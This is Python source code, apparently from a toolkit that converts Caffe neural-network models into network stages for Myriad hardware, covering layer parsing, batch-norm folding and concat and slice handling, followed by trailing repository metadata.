[layer.lrn_param.k, layer.lrn_param.alpha, layer.lrn_param.beta, 0], dtype=data_type)
elif isConvolution(layer.type) or isDeconvolution(layer.type):
if layer.convolution_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isFCL(layer.type):
if layer.inner_product_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isBatchNorm(layer.type):
if blobs[layer.name][2].data[0] == 0:
mean = np.zeros(blobs[layer.name][0].data.shape)
var = np.zeros(blobs[layer.name][1].data.shape) + \
layer.batch_norm_param.eps
else:
mean = blobs[layer.name][0].data * \
(1 / blobs[layer.name][2].data[0])
var = blobs[layer.name][1].data * \
(1 / blobs[layer.name][2].data[0]) + layer.batch_norm_param.eps
mult = np.reciprocal(np.sqrt(var))
bias = -mean * mult
return mult.astype(dtype=data_type), bias.astype(dtype=data_type)
elif isScale(layer.type):
if layer.scale_param.bias_term:
return blobs[layer.name][0].data.astype(
dtype=data_type), blobs[layer.name][1].data.astype(dtype=data_type)
else:
return blobs[layer.name][0].data.astype(dtype=data_type), None
elif isPReLU(layer.type):
return None, blobs[layer.name][0].data
elif isNormalize(layer.type):
return blobs[layer.name][0].data.astype(dtype=data_type)
else:
return None, None
def caffe_apply_minor_op(network, layer, top):
"""
Searches through the network for the applicable node that we want to attach a minor op to and attaches it.
:param network:
:param layer:
:return:
"""
if isReLU(layer.type) or isELU(layer.type):
if top is not None and not isinstance(top[0], str):
top = top[0]
for prevlayer in top:
if isReLU(layer.type):
applicable_node = network.search(prevlayer)
if layer.relu_param.negative_slope == 0.0:
applicable_node.postOp = StageType.relu
else:
applicable_node.postOp = StageType.leaky_relu
applicable_node.post_param1 = layer.relu_param.negative_slope
if isELU(layer.type):
applicable_node = network.search(prevlayer)
applicable_node.postOp = StageType.elu
applicable_node.post_param1 = layer.elu_param.alpha
if len(top) == 1:
                # This should always be here, but for now we don't support this
# when applying ReLU to a concat
applicable_node.unprocessed_name = layer.top[0]
applicable_node.name = set_string_range(
layer.top[0], 100).encode('ascii')
elif isConcat(layer.type):
global concat_tracker
concat_tracker.append((layer.top[0], layer.bottom))
elif isSlice(layer.type):
global slice_tracker
slice_tracker.append(
(layer.top, layer.bottom, layer.slice_param.slice_point))
else:
throw_error(ErrorTable.StageTypeNotSupported, layer.type)
def create_input_layer(myriad_conf, arguments, network, input_shape, input_name):
node = NetworkStage(input_name,
None, # top
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.none,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
input_shape[3],
input_shape[2],
input_shape[1],
# fh, fw
1,
1,
# Output Channels (K)
input_shape[1],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
arguments,
new_x=0,
new_y=0,
new_c=0)
network.attach(node)
return node
def parse_caffe(arguments, myriad_conf, debug=False, file_gen=False):
path = arguments.net_description
weights = arguments.net_weights
input_image = arguments.image
outputNodeName = arguments.output_node_name
inputNodeName = arguments.input_node_name
raw_scale = arguments.raw_scale
filename = arguments.outputs_name
mean = arguments.mean
channel_swap = arguments.channel_swap
caffe.set_mode_cpu()
description = path
if weights is None:
open("zero_weights.caffemodel", "wb").close()
weights = "zero_weights.caffemodel"
print("\033[91m****** WARNING: using empty weights ******\033[0m")
if not os.path.isfile(weights):
throw_error(ErrorTable.ArgumentErrorWeights)
try:
net = caffe.Net(description, weights, caffe.TEST)
except MemoryError:
throw_error(ErrorTable.CaffeMemoryError)
try:
f = open(description)
file_contents = f.read()
f.close()
except BaseException:
throw_error(ErrorTable.ArgumentErrorDescription)
msg = caffe_pb2.NetParameter() # Parse via Caffe's NetParameter
text_format.Merge(str(file_contents), msg)
    # If our inputNodeName is after a split, we have to start one step before in order
# to run the split and fill all the inputs for all the paths before concat
layers = msg.layer
if len(layers) == 0:
layers = msg.layers
startNodeName = inputNodeName
if layers[0].type == 'Input':
try:
input_shape = layers[0].input_param.shape[0].dim
input_bottom = layers[0].top[0] # Input name, normally "data"
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
else:
try:
input_shape = msg.input_shape[0].dim
input_bottom = layers[0].bottom[0] # Input name, normally "data"
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
if(input_shape[0] != 1):
throw_error(ErrorTable.AttemptedBatchMode)
if inputNodeName:
input_bottom = net.bottom_names[inputNodeName][0]
for i, layername in enumerate(net._layer_names):
if input_bottom in net.top_names[layername]:
if net.layers[i].type == 'Split':
input_bottom = net.bottom_names[layername][0]
startNodeName = layername
input_shape = [
net.blobs[input_bottom].shape[0],
net.blobs[input_bottom].shape[1],
net.blobs[input_bottom].shape[2],
net.blobs[input_bottom].shape[3]]
# Network
if input_image is None or input_image == "Debug":
try:
input_data = np.ones(input_shape).astype(data_type)
except BaseException:
throw_error(ErrorTable.InputSyntaxNotSupported)
input_data = np.random.uniform(-1, 1,
input_shape).astype(dtype=data_type)
else:
input_data = parse_img(
input_image,
input_shape,
raw_scale=raw_scale,
mean=mean,
channel_swap=channel_swap)
if outputNodeName is None:
outputNodeName = net.outputs[0]
network = Network(msg.name, input_data)
arguments.network = network
prev_output_shape = [input_data[0].shape]
global concat_tracker
last_layer = None
first_layer = None
nlayers = len(layers)
# Create input layer
create_input_layer(myriad_conf, arguments, network, input_shape, input_bottom)
inshape = input_shape
prev_output_shape = [input_data[0].shape]
top = None
# Check if last layer's "name" & "top" have same name
for idx, layer in enumerate(layers):
if(net.outputs[0] in layer.top):
if(layer.name != layer.top[0]):
throw_warning(ErrorTable.OutputNodeNameTopMismatch,
(layer.name, layer.top[0]))
for idx, layer in enumerate(layers):
# debug = True
if debug:
print("------------")
print(layer)
if layer.type == 'Input':
continue
if inputNodeName:
if inputNodeName == layer.name:
first_layer = layer
elif first_layer is None:
continue
if isEltwise(layer.type) and len(
layer.bottom) == 2 and layer.bottom[0] == input_bottom:
tmp = layer.bottom[0]
layer.bottom[0] = layer.bottom[1]
layer.bottom[1] = tmp
        # First Node's top has to be None, but this also applies to other layers
        # that have the same bottom as the first layer
curslicing = []
if layer.bottom[0] == input_bottom:
top = None
prev_output_shape = [input_data[0].shape]
else:
# Check if our bottoms come from Slice
for slice in slice_tracker:
for i in range(len(slice[0])):
for j in range(len(layer.bottom)):
if layer.bottom[j] == slice[0][i]:
# It's one of Slice outputs, take its input
# 4 dims, second is nplanes
inputplanes = net.blobs[slice[1][0]].shape[1]
start = 0 if i == 0 else slice[2][i - 1]
end = slice[2][i] if i < len(
slice[2]) else inputplanes
if slice[1][0] == input_bottom:
curslicing.append([None, start, end])
else:
curslicing.append([slice[1][0], start, end])
layer.bottom[j] = slice[1][0]
break
# Convert layer.bottom, which is a protobuf object, into a list in
# order to be editable
top = []
for obj in layer.bottom:
top.append(obj)
# Concat check
if len(concat_tracker) != 0:
# We track all previous concats, as we may have a many-to-many
# connection
for concat in concat_tracker:
for i in range(len(top)):
if concat[0] == top[i]:
                        # Otherwise the next layer would try to attach to the
                        # non-existent concat intermediary node.
top[i] = concat[1]
if top[0] == input_bottom:
top = None
prev_output_shape = [input_data[0].shape]
else:
prev_output_shape = []
nodes = network.search_several(top)
if isConcat(layer.type):
for node_i, node in enumerate(nodes):
node.concat_axis = layer.concat_param.axis
# nodes is a list, which can contain nodes or list of nodes, in
# case of concat
if len(nodes) == 0:
throw_error(ErrorTable.GraphConstructionFailure, top)
for i, node in enumerate(nodes):
if node == 0:
throw_error(
ErrorTable.GraphConstructionFailure, top[i])
if hasattr(node, '__iter__'):
# node is a list of nodes, i.e. nodes that make a
# concat
shape = node[0].output.shape
for i in range(len(node)):
if i > 0:
if node[i].concat_axis == 1:
if (shape[1] != node[i].output.shape[1] or
shape[2] != node[i].output.shape[2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
shape = (shape[0] + node[i].output.shape[0], shape[1], shape[2])
elif node[i].concat_axis == 2:
if (shape[0] != node[i].output.shape[0] or
shape[2] != node[i].output.shape[2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
shape = (shape[0], shape[1]+ node[i].output.shape[1], shape[2])
else:
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
prev_output_shape.append(shape)
else:
prev_output_shape.append(node.output.shape)
inshape = prev_output_shape[0]
# Only eltwise and concat supports multiple inputs now
if isEltwise(layer.type) or isConcat(layer.type):
for i in range(len(prev_output_shape)):
if i > 0:
if isEltwise(layer.type) or (isConcat(layer.type) and layer.concat_param.axis == 1):
if (inshape[1] != prev_output_shape[i][1] or
inshape[2] != prev_output_shape[i][2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
inshape = (max(inshape[0], prev_output_shape[i][0]), inshape[1], inshape[2])
else:
# We have a concat on axis != 1. Most probably axis 2.
if (inshape[0] != prev_output_shape[i][0] or
inshape[2] != prev_output_shape[i][2]):
throw_error(ErrorTable.StageDetailsNotSupported, layer.name)
inshape = (inshape[0], max(inshape[1], prev_output_shape[i][1]), inshape[2])
if isDropout(layer.type):
continue
if isBatchNorm(layer.type) or isScale(layer.type):
# Check if absorption is possible into a convolution
node = network.search(layer.bottom[0])
if node != 0 and (
node.op == StageType.convolution or node.op == StageType.depthwise_convolution):
w, b = get_caffe_params(layer, net.params)
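            # Folding: the conv output y = conv(x, taps) + bias followed by
            # y * w + b equals conv(x, taps * w) + (bias * w + b), so the
            # scale/shift is absorbed per output channel into taps and bias.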
# Transpose in order to be able to use dimension broadcasting
node.taps = (node.taps.T * w).T
if node.bias is not None:
if b is not None:
node.bias = node.bias * w + b
else:
node.bias = node.bias * w
else:
if b is not None:
node.addBias(np.array(b).astype(np.float16))
node.name = node.unprocessed_name + '/' + layer.name
node.changeName(node.name)
node.alias.append(node.unprocessed_name)
node.alias.append(layer.name)
if layer.name == outputNodeName:
break
continue
if isInnerLRN(layer):
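            # Within-channel LRN is emitted as four primitive stages:
            # square -> average pooling over the local window -> innerlrn
            # (which evaluates (k + alpha * avg) ** -beta from the parameters
            # passed below) -> element-wise product with the original input.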
# Square the inputs
network.attach(
NetworkStage(layer.name + "_Square",
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.square,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
0,
0,
# Output Channels (K)
inshape[0],
# Taps, Bias
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# Average pooling of squares
network.attach(
NetworkStage(layer.name + "_AvgPool",
[layer.name + "_Square"],
StorageOrder.orderZYX,
# Padding
(layer.lrn_param.local_size - 1) // 2,
(layer.lrn_param.local_size - 1) // 2,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
# Radix and stride
layer.lrn_param.local_size,
layer.lrn_param.local_size,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
layer.lrn_param.local_size,
layer.lrn_param.local_size,
# Output Channels (K)
inshape[0],
# Taps, Bias
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# (1 + alpha * prev) ^ -beta
network.attach(
NetworkStage(layer.name + "_InnerLRN",
[layer.name + "_AvgPool"],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.innerlrn,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps
None,
TapsOrder.orderKCHW,
# Biases (lrn parameters here)
np.array([layer.lrn_param.k, layer.lrn_param.alpha,
layer.lrn_param.beta, 0], dtype=data_type),
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
# Multiply input with previous stage output
if top is None:
top = [layer.name + "_InnerLRN", None]
else:
top = [top[0], layer.name + "_InnerLRN"]
network.attach(
NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.eltwise_prod,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
args=arguments)
)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isReshape(layer.type):
if(len(layer.reshape_param.shape.dim) == 3):
new_shape_X = 1
new_shape_Y = layer.reshape_param.shape.dim[2]
new_shape_C = layer.reshape_param.shape.dim[1]
else:
new_shape_X = layer.reshape_param.shape.dim[3]
new_shape_Y = layer.reshape_param.shape.dim[2]
new_shape_C = layer.reshape_param.shape.dim[1]
network.attach(
NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.reshape,
# Radix and stride
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
1,
1,
# Output Channels (K)
inshape[0],
# Taps, Bias,
None,
TapsOrder.orderKCHW,
None,
# Pre and post ops
None,
StageType.none,
None,
0,
0,
None,
myriad_conf,
arguments,
new_x = new_shape_X,
new_y = new_shape_Y,
new_c = new_shape_C)
)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isPriorBox(layer.type):
params = np.array((prev_output_shape[1][1], # img H
prev_output_shape[1][2], # img W
len(layer.prior_box_param.min_size),
len(layer.prior_box_param.max_size),
len(layer.prior_box_param.aspect_ratio),
len(layer.prior_box_param.variance),
layer.prior_box_param.flip,
layer.prior_box_param.clip),
dtype=np.dtype("<f4"))
params = np.append(params, layer.prior_box_param.min_size[0:])
params = np.append(params, layer.prior_box_param.max_size[0:])
params = np.append(params, layer.prior_box_param.aspect_ratio[0:])
params = np.append(params, layer.prior_box_param.variance[0:])
if (layer.prior_box_param.HasField("step_w") and
layer.prior_box_param.HasField("step_h")):
                # We don't check for both step and step_w/step_h being set
                # because caffe should yield an error before this.
params = np.append(params, layer.prior_box_param.step_w)
params = np.append(params, layer.prior_box_param.step_h)
elif (layer.prior_box_param.HasField("step")):
params = np.append(params, layer.prior_box_param.step)
params = np.append(params, layer.prior_box_param.step)
else:
params = np.append(params, 0)
params = np.append(params, 0)
params = np.append(params, layer.prior_box_param.offset)
params = params.astype(dtype = np.dtype("<f4"))
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer), # op_type
1, 1, # op_x, op_y,
1, 1, # sx, sy,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0, # fw, fh
get_caffe_output_channels(layer, inshape, top, network),
None, None, None, # taps, taps_order, bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
myriad_config=myriad_conf, args=arguments,
opParams=params)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isDetectionOutput(layer.type)):
detection_param = layer.detection_output_param
share_location = 1 if detection_param.share_location else 0
det_out_dtype = np.dtype("<i4, <i4, <i4, <f4, <i4, <i4, <i4, <f4, <i4, <f4")
op_params = np.array((detection_param.num_classes,
share_location,
detection_param.background_label_id,
detection_param.nms_param.nms_threshold,
detection_param.nms_param.top_k,
detection_param.code_type,
detection_param.keep_top_k,
detection_param.confidence_threshold,
detection_param.variance_encoded_in_target,
detection_param.nms_param.eta), det_out_dtype)
op_params = op_params.flatten()
op_params = op_params.view("<f4")
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer),
1, 1,
1, 1,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0,
get_caffe_output_channels(layer, inshape, top, network),
taps, TapsOrder.orderKCHW, None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0, myriad_conf, args=arguments,
opParams=op_params,
new_y=detection_param.keep_top_k)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isPower(layer.type) or
isNormalize(layer.type) or
isPermute(layer.type)):
taps = None
(new_x, new_y, new_c) = (0, 0, 0)
if isPower(layer.type):
op_params = np.array((layer.power_param.shift,
layer.power_param.scale,
layer.power_param.power),
dtype = np.dtype("<f4"))
elif isNormalize(layer.type):
op_params = np.array((layer.norm_param.across_spatial,
layer.norm_param.channel_shared),
dtype = np.dtype("int32"))
taps = get_caffe_params(layer, net.params)
elif isPermute(layer.type):
caffe_perm_ord = np.array(layer.permute_param.order[1:], dtype = "i4")
if(np.count_nonzero(caffe_perm_ord) != len(caffe_perm_ord)):
raise Exception("Permute on batch axis is not supported. \
Layer = {0}".format(layer.name))
perm_ord = np.arange(3)
                # Caffe axes are NCHW (0,1,2,3). Myriad axes are CHW (0,1,2).
                # Hence subtract 1.
perm_ord[0 : len(caffe_perm_ord)] = caffe_perm_ord - 1
new_c, new_y, new_x = np.array(inshape)[perm_ord]
# Decode the caffe permute order to myriad permute order.
ord_decoder = np.array([2, 0, 1], dtype = "i4")
myriad_perm_ord = ord_decoder[np.roll(perm_ord, -1)]
op_params = np.array(myriad_perm_ord, dtype = "i4")
node = NetworkStage(layer.name, top, StorageOrder.orderZYX,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
get_caffe_op_type(layer),
1, 1,
1, 1,
inshape[2], inshape[1], inshape[0], # X, Y, Z
0, 0,
get_caffe_output_channels(layer, inshape, top, network),
taps, TapsOrder.orderKCHW, None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0, myriad_conf, args=arguments,
new_x = new_x, new_y = new_y, new_c = new_c,
opParams = op_params)
network.attach(node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isSoftMax(layer.type):
softmax_param = np.array([(layer.softmax_param.axis)],
dtype=np.dtype("<i4"))
if(softmax_param[0] not in (1, 2)):
throw_error(ErrorTable.StageTypeNotSupported,
"Axis parameter value {0} for layer {1} of type {2}".format(
softmax_param[0], layer.name, layer.type))
softmax_node = NetworkStage(layer.name,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
get_caffe_op_type(layer),
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
0,
0,
get_caffe_output_channels(
layer, inshape, top, network),
None,
TapsOrder.orderKCHW,
None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0,
myriad_conf,
args=arguments,
opParams = softmax_param)
network.attach(softmax_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if isCrop(layer.type):
# Caffe axis storage order N, C, H, W is assumed. Where W is the
# fastest growing dimension.
crop_axis = layer.crop_param.axis
if crop_axis < 0:
crop_axis += 4
if crop_axis == 0:
throw_error(ErrorTable.AttemptedBatchMode)
crop_offset = np.array([0, 0, 0], np.dtype("<u4"))
for offset_i in range(0, 3):
if offset_i >= crop_axis - 1:
if len(layer.crop_param.offset) == 1:
crop_offset[offset_i] = layer.crop_param.offset[0]
else:
crop_offset[offset_i] = \
layer.crop_param.offset[offset_i - (crop_axis - 1)]
# MvTensor crops a 3D volume with dimensions XYZ and storage
# order S.
# Toolkit/MvTensor axis storage order is assumed to be (N)HWC.
            # Where the fastest growing dimension is C. Hence X = H, Y = W,
# Z = C and N = 1 always.
# The offset structure has the order: offset_X, offset_Y,
# offset_Z hence the parameters array has to be:
            # [offset_H, offset_W, offset_Z]
crop_offset = np.array([crop_offset[2], crop_offset[1],
crop_offset[0]], dtype=np.dtype("<u4"))
ref_bottom = network.search_several(layer.bottom[1])
ref_bottom_dimX = ref_bottom.outputDimX
ref_bottom_dimY = ref_bottom.outputDimY
ref_bottom_dimZ = ref_bottom.outputDimZ
# Using the new_x, new_y, new_c as in reshape to set the
# output dimensions and pass the parameters to the crop
# function.
ref_dims = {
0: (ref_bottom_dimX, ref_bottom_dimY, ref_bottom_dimZ),
1: (ref_bottom_dimX, ref_bottom_dimY, inshape[0]),
2: (ref_bottom_dimX, inshape[1], inshape[0])
}
            # Call with crop_axis - 1 because in caffe the first axis is
# batch size.
(new_x, new_y, new_c) = ref_dims.get(crop_axis - 1)
crop_node = NetworkStage(layer.name,
top, StorageOrder.orderZYX,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
get_caffe_op_type(layer),
1,
1,
1,
1,
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
0,
0,
get_caffe_output_channels(
layer, inshape, top, network),
None,
TapsOrder.orderKCHW,
None,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
0,
myriad_conf,
args=arguments,
new_x=new_x,
new_y=new_y,
new_c=new_c,
opParams=crop_offset)
network.attach(crop_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (isConcat(layer.type) or (isConvolution(layer.type) and get_caffe_kernel_size(layer)[0] > 1) or (
isDeconvolution(layer.type) and get_caffe_kernel_size(layer)[0] > 1)) and len(curslicing) > 0:
            # Concat of sliced inputs cannot work directly, so we have to add an explicit slice layer
# Convolution also does not support input strides
# Convolution dilation is not supported for slicing.
conv_dilation = 1
layer_params = np.array([conv_dilation], dtype=np.dtype("<i4"))
for slice in curslicing:
for i in range(len(top)):
if top[i] == slice[0]:
slicename = layer.name + '_Slice' + \
str(slice[1]) + '_' + str(slice[2])
network.attach(
NetworkStage(slicename,
[slice[0]],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
inshape[2],
inshape[1],
inshape[0],
1,
1,
slice[2] - slice[1],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params)
)
top[i] = slicename
if arguments.explicit_concat and isConcat(layer.type):
outstride = 2 * sum(prev_output_shape[idx][0]
for idx in range(len(top)))
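            # 2 bytes per fp16 element: the shared output stride spans all
            # concatenated channels, and outputPointer below advances by
            # 2 * channels for each input that is copied in.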
for idx, prev in enumerate(top):
if idx == 0:
substagename = layer.name
else:
substagename = layer.name + '_' + \
('input' if prev is None else prev)
node = NetworkStage(
substagename,
top if idx == 0 else [
top[idx]],
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
prev_output_shape[idx][2],
prev_output_shape[idx][1],
prev_output_shape[idx][0],
1,
1,
prev_output_shape[idx][0],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
if idx == 0:
firstnode = node
network.attach(node)
if idx == 0:
if layer.name == outputNodeName:
outputPointer, outputIndex = node.setoutput(
outstride, 0, MemoryIndex.output.value)
else:
outputPointer, outputIndex = node.setoutput(outstride)
else:
node.setoutput(outstride, outputPointer, outputIndex)
outputPointer = outputPointer + 2 * prev_output_shape[idx][0]
if layer.name == outputNodeName:
firstnode.isoutput = True
break
continue
if isDepthwiseConvolution(layer, get_caffe_output_channels(
layer, inshape, top, network), inshape[0]):
depthwise_node = NetworkStage(layer.name, top,
StorageOrder.orderZYX, # s_order,
# pad_x, pad_y, pad_type,
get_caffe_op_padding(layer)[0],
get_caffe_op_padding(layer)[1],
PadStyle.caffe,
# dtype, precision,
DataType.fp16,
DataType.fp16,
# op_type
StageType.depthwise_convolution,
# op_x, op_y
get_caffe_op_radix(layer)[0],
get_caffe_op_radix(layer)[1],
# sx, sy
get_caffe_op_stride(layer)[0],
get_caffe_op_stride(layer)[1],
# x, y, c
inshape[2],
inshape[1],
inshape[0],
# fh, fw
get_caffe_kernel_size(layer)[0],
get_caffe_kernel_size(layer)[1],
# Output Channels (K)
get_caffe_output_channels(
layer, inshape, top, network),
# taps, taps_order
get_caffe_params(
layer, net.params)[0],
TapsOrder.orderKCHW,
# bias, pre_op_type, post_op_type,
get_caffe_params(
layer, net.params)[1],
None,
None,
# post_1, post_sx, post_sy, slicing = None
0,
0,
0,
None,
myriad_conf,
args=arguments)
network.attach(depthwise_node)
last_layer = layer
if layer.name == outputNodeName:
break
continue
if (
not isReLU(layer.type) and not
isConcat(layer.type) and not
isSlice(layer.type) and not
isELU(layer.type) and not
isDepthwiseConvolution(
layer,
get_caffe_output_channels(
layer,
inshape,
top,
network),
inshape[0])):
layer_params = None
if(isConvolution(layer.type) or isDeconvolution(layer.type)):
# Currently only equal dilation on all axes is supported.
conv_dilation = 1
if(len(layer.convolution_param.dilation) > 0):
conv_dilation = layer.convolution_param.dilation[0]
layer_params = np.array([conv_dilation], dtype=np.dtype("<i4"))
ngroups = get_caffe_group(layer)
addednodes = []
addednames = []
for group in range(ngroups):
taps = get_caffe_params(layer, net.params)[0]
if(isDeconvolution(layer.type)):
                # For Deconv the weights are in CKHW format.
                # Transform to KCHW.
taps = np.swapaxes(taps, 0, 1)
                # Taps need to be rotated in the HW plane because caffe
                # implements the deconvolution via the convolution backward
                # pass, which does a 180-degree rotation.
taps = taps[:,:,::-1,::-1]
bias = get_caffe_params(layer, net.params)[1]
prev = top
layername = layer.name
if ngroups > 1: # Warning: group convolution cannot follow slice
curslicing = []
curslicing.append([(top[0] if top is not None else None),
inshape[0] // ngroups * group,
inshape[0] // ngroups * (group + 1)])
if(isDeconvolution(layer.type)):
taps = taps[:, taps.shape[1] // ngroups *
group: taps.shape[1] // ngroups * (group + 1), ]
else:
taps = taps[taps.shape[0] // ngroups *
group: taps.shape[0] // ngroups * (group + 1), ]
if bias is not None:
bias = bias[bias.shape[0] // ngroups *
group: bias.shape[0] // ngroups * (group + 1), ]
if get_caffe_kernel_size(layer)[0] > 1:
if top is None:
slicename = 'input'
else:
slicename = top[0] if isinstance(
top[0], str) else top[0][0]
slicename = slicename + '_s' + str(group)
network.attach(
NetworkStage(
slicename,
top,
StorageOrder.orderZYX,
0,
0,
PadStyle.caffe,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
inshape[2],
inshape[1],
inshape[0],
1,
1,
inshape[0] // ngroups,
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params))
prev = [slicename]
addednames.append(layer.name + '_p' + str(group))
layername = layer.name + '_p' + str(group)
node = NetworkStage(
# Name, Top, Order
layername,
prev,
StorageOrder.orderZYX,
# Padding
get_caffe_op_padding(layer)[0],
get_caffe_op_padding(layer)[1],
PadStyle.caffe,
DataType.fp16, DataType.fp16,
# Op, StrideX, StrideY
get_caffe_op_type(layer),
get_caffe_op_radix(layer)[0],
get_caffe_op_radix(layer)[1],
get_caffe_op_stride(layer)[0],
get_caffe_op_stride(layer)[1],
# X, Y, Z
inshape[2],
inshape[1],
inshape[0],
# fh, fw
get_caffe_kernel_size(layer)[0],
get_caffe_kernel_size(layer)[1],
# Output Channels (K)
get_caffe_output_channels(
layer, inshape, top, network) // ngroups,
taps,
TapsOrder.orderKCHW,
bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
curslicing,
myriad_conf,
args=arguments,
opParams=layer_params
)
network.attach(node)
addednodes.append(node)
if ngroups > 1:
if idx == nlayers - 1:
NetworkStage.concat(addednodes)
else:
concat_tracker.append((layer.name, addednames))
else:
caffe_apply_minor_op(network, layer, top)
last_layer = layer
if layer.name == outputNodeName:
break
if last_layer.type == 'Concat':
nodes = network.search_several(last_layer.bottom)
NetworkStage.concat(nodes)
if(isDetectionOutput(last_layer.type)):
network.outputIsSsdDetOut = True
if outputNodeName is not None:
if inputNodeName is not None:
# Ensure we have the same inputs for each method
net.blobs[input_bottom].data[...] = input_data
try:
net.forward(start=startNodeName, end=outputNodeName)
except BaseException:
throw_error(ErrorTable.NoOutputNode,
outputNodeName + "/" + startNodeName)
else:
# Ensure we have the same inputs for each method
net.blobs['data'].data[...] = input_data
try:
net.forward(end=outputNodeName)
except BaseException:
throw_error(ErrorTable.NoOutputNode, outputNodeName)
else:
if inputNodeName is not None:
# Ensure we have the same inputs for each method
net.blobs[input_bottom].data[...] = input_data
net.forward(start=startNodeName)
else:
# Ensure we have the same inputs for each method
net.blobs['data'].data[...] = input_data
net.forward()
if file_gen:
try:
np.save(filename + "_expected.npy",
net.blobs[outputNodeName].data[0].astype(dtype=np.float16))
except BaseException:
throw_error(ErrorTable.NoOutputNode, extra=net.blobs.keys())
caffe_output_shape = net.blobs[outputNodeName].data.shape
output_shape = np.ones(3, dtype = "i4")
    # Subtract 1 because the caffe output will (almost) always have the batch dimension.
output_shape_len = len(caffe_output_shape) - 1
output_shape[0 : output_shape_len] = caffe_output_shape[1:]
network.outputTensor = zyx_to_yxz_dimension_only(output_shape)
return network
| 43.081379
| 119
| 0.445572
|
cf62f3e5d53a951036b2ae04edaea894a2cc712e
| 1,433
|
py
|
Python
|
setup.py
|
macklenc/mtnlion
|
ba2e93faeed3004d344a8c14f37a409da572271d
|
[
"MIT"
] | null | null | null |
setup.py
|
macklenc/mtnlion
|
